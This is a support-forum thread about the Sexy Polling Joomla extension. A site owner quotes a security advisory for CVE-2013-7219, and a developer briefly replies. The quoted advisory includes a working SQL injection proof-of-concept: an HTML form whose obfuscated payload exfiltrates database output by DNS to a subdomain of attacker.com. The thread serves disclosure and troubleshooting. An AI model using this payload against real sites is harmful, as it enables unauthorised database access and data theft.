SQL Injection

Find out what does your audience think

SQL Injection

New postby srm » Mon Feb 02, 2015 8:10 pm

Hi Have a huuuuge problem.

My hosting company have listed the following and it is causing major issues on my server as the CPU is running far to high.

I was sent this;

Advisory Details:

High-Tech Bridge Security Research Lab discovered vulnerability in Sexy Polling Joomla Extension, which can be exploited to perform SQL Injection attacks.

1) SQL Injection in Sexy Polling Joomla Extension: CVE-2013-7219
The vulnerability exists due to insufficient validation of "answer_id[]" HTTP POST parameter passed to "/components/com_sexypolling/vote.php" script. A remote unauthenticated attacker can execute arbitrary SQL commands in application's database.
The following exploitation example is based on DNS Exfiltration technique and may be used if the database of the vulnerable application is hosted on a Windows system. The PoC will send a DNS request demanding IP address for `version()` (or any other sensitive output from the database) subdomain of ".attacker.com" (a domain name, DNS server of which is controlled by the attacker):
<form action="http://[host]/components/com_sexypolling/vote.php"
method="post" name="main">
<input type="hidden" name="answer_id[]" value="',(select load_file(CONCAT(CHAR(92),CHAR(92),(select
version()),CHAR(46),CHAR(97),CHAR(11 6),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),C HAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR (114)))),'','','','','')
-- ">
<input type="submit" id="btn">
</form>

Please can I have assistance urgently.
srm
 
Posts: 5
Joined: Fri Jan 09, 2015 12:04 pm

Re: SQL Injection

New postby Edvard » Tue Feb 03, 2015 4:13 pm

You are going in a wrong direction. Please check your access logs to understand what the problem is.

Thanks!
Regards,

Edvard Ananyan - 2GLux Team

Please post a review at the Joomla Extensions Directory. It is very important for us!
Edvard
Site Admin
 
Posts: 1836
Joined: Mon Jun 28, 2010 1:54 pm
Location: Yerevan, Armenia


Return to Sexy Polling

Who is online

Users browsing this forum: No registered users and 3 guests